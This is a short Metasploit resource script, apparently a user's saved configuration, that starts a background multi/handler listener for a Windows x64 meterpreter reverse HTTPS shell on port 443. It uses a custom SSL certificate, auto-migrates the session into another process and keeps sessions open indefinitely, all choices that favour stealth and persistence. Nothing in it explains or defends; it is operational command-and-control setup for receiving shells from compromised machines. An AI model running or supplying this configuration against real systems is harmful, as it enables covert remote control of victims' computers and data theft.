use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_https
set LHOST 0.0.0.0
set LPORT 443
set HandlerSSLCert /home/user666/Documents/Payload/ms_unified.pem
set StagerVerifySSLCert true
set ExitOnSession false
set SessionCommunicationTimeout 0
set AutoRunScript post/windows/manage/migrate
exploit -j -z
